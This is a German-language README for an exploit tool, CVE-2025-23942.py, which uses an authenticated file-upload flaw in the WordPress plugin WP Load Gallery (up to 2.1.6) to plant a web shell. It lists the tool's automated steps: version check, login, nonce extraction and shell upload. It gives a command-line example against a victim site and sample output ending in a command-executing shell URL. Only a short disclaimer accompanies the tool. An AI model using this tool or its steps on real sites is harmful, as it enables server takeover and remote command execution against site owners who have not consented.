
WP Load Gallery <= 2.1.6 - Authentifiziert (Autor+) Beliebiger Datei-Upload
Die Schwachstelle 'Unrestricted Upload of File with Dangerous Type' in NgocCode WP Load Gallery ermöglicht das Hochladen einer Web-Shell auf einen Webserver. Dieses Problem betrifft WP Load Gallery: von n/a bis 2.1.6.
✅ Automatisierte Ausnutzung – Extrahiert Nonce, meldet sich an und lädt die Shell automatisch hoch.
✅ Versionsprüfung – Bestätigt, ob das Ziel verwundbar ist, bevor die Ausnutzung erfolgt.
✅ Fehlerbehandlung – Stellt einen reibungslosen Ablauf auch bei Fehlern sicher.
✅ Sitzungsverwaltung – Verwendet persistente Sitzungsverwaltung für die Authentifizierung.
✅ Echtzeit-Feedback – Gibt zu jedem Schritt eine Ausgabe.
requests module (pip install requests)Führen Sie das Skript mit den erforderlichen Parametern aus:
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit WP Load Gallery - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
Beispiel:
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123
_______ ________ ___ ___ ___ _____ ___ ____ ___ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \|___ \ / _ \| || |__ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__ _/ /
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ ___) | / / | |/ /_
\_____| \/ |______| |____|\___/____|____/ |____|____/ /_/ |_|____|
[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id
Dieses Exploit ist für ausschließlich Bildungs- und Sicherheitsforschungszwecke bestimmt. Verwenden Sie es nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine explizite Erlaubnis zum Testen haben. Der Autor übernimmt keine Verantwortung für jeglichen Missbrauch dieses Skripts. ( Khaled_alenazi )